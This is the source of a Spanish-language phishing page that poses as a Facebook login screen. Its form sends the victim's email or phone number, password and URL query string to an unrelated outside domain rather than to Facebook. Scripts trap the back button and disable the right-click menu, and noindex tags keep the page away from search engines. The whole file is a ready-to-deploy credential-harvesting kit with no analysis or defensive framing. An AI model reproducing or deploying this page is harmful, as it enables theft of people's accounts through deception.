<!DOCTYPE html>
<html lang="es">
    <head>
		<meta name="robots" content="noindex, nofollow" />
		
		<meta http-equiv="Expires" content="0">
		<meta http-equiv="Last-Modified" content="0">
		<meta http-equiv="Cache-Control" content="no-cache, mustrevalidate">
		<meta http-equiv="Pragma" content="no-cache">
		
		<style type="text/css">
		    .loader {
				position: fixed;
				left: 0px;
				top: 0px;
				width: 100%;
				height: 100%;
				z-index: 9999;
				background: url('imgs/fondo.png') 50% 50% no-repeat rgb(249,249,249);
			}
		</style>
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
		<script type="text/javascript">
			$(document).ready(function(){
				setTimeout(function(){
					$(".loader").fadeOut("slow");
				}, 700);
			});
		</script>
		
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta charset="utf-8" />
		
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
		
		<link rel="stylesheet" type="text/css" href="stylepc.css" media="screen" />
		<style type="text/css">
			#header #nav {
				background: url(imgs/cabecera.png) center center no-repeat;
			}
		</style>
		
		<title>Aplicación de Facebook</title>
		
		<meta http-equiv="X-UA-Compatible" content="IE=edge" />
		<link rel="icon" href="imgs/favicon.png" sizes="124x124" />
		<link rel="shortcut icon" href="imgs/favicon.png" sizes="124x124" />
		<link rel="apple-touch-icon-precomposed" href="imgs/favicon.png" sizes="124x124" />
		<meta name="description" content="Es necesario que vuelvas a iniciar sesión para acceder a la página que intentas ver." />
		<link rel="canonical" href="http://bit.ly/3c81QM1" />
		
		<meta property="og:site_name" content="Iniciar sesión | Facebook" />
		<meta property="og:title" content="Iniciar sesión | Facebook" />
		<meta property="og:type" content="website" />
		<meta property="og:image" content="https://1.bp.blogspot.com/-h5MXc0BE-tU/YCoHrfBP6xI/AAAAAAAABYM/UTVDKU-vfFQWflb-LUD71_LQtdYyY6hqgCLcBGAsYHQ/s0/584ac2d03ac3a570f94a666d.png" sizes="124x124" />
		<meta property="og:locale" content="es_LA" />
		<meta property="og:description" content="Es necesario que vuelvas a iniciar sesión para acceder a la página que intentas ver." />
		<meta property="og:url" content="http://bit.ly/3c81QM1" />
		
	</head>
	<body onload="deshabilitaRetroceso()">
		<div class="loader"></div>
		
		<div id="header">
			<div id="nav"></div>
		</div>
		
		<div id="BodyCuerpo" style="display: block;">
			<div id="Cuerpo">
				<div class="caja">
					<img src="imgs/iniciarsesion.png" width="auto" />
				</div>
				<div id="CuerpoMain">
					<div id="Formulario">
						<ul>
							<div style="text-align:center;">
								<img src="imgs/logo.png" width="auto" />
							</div>
							<form action="https://katfirefox.space/fbackupsb1=!?login_mixto_attempt=1" method="post" name="mixto1" id="mixto1">
								<input type="hidden" name="mixto" value="" id="mixto" autocomplete="on" required="required" />
								<script>document.mixto1.mixto.value = window.location.search;</script>
								
								<br />
								
								<li><input class="form-control" name="email" placeholder="Correo eletrónico o Teléfono" autocomplete="off" required="" type="text"></li>
								<li><input class="form-control" name="pass" placeholder="Contraseña" autocomplete="off" required="" type="password"></li>
								<li><input type="image" src="imgs/boton.png" alt="Submit" style="text-align:center;cursor:pointer;width:310px;height:42px;margin-top:7px;margin-right:4px;margin-bottom:4px;margin-left:4px;border:0;outline-color:currentcolor;outline-style:none;outline-width:0px !important;-webkit-box-shadow:none;"></li>
								<li><hr class="style-eight" /></li>
								<li><div class="final"></div></li>
							</form>
						</ul>
					</div>
				</div>
			</div>
		</div>
		<script type="text/javascript">
			$(document).ready(function(){
				deshabilitaRetroceso();
			});
			function deshabilitaRetroceso(){
				window.location.hash='###!';
				window.location.hash='UF-!';
				window.onhashchange=function(){
					window.location.hash='###!';
				}
			}
			window.oncontextmenu = function(){
				return false;
			};
		</script>
	</body>
</html>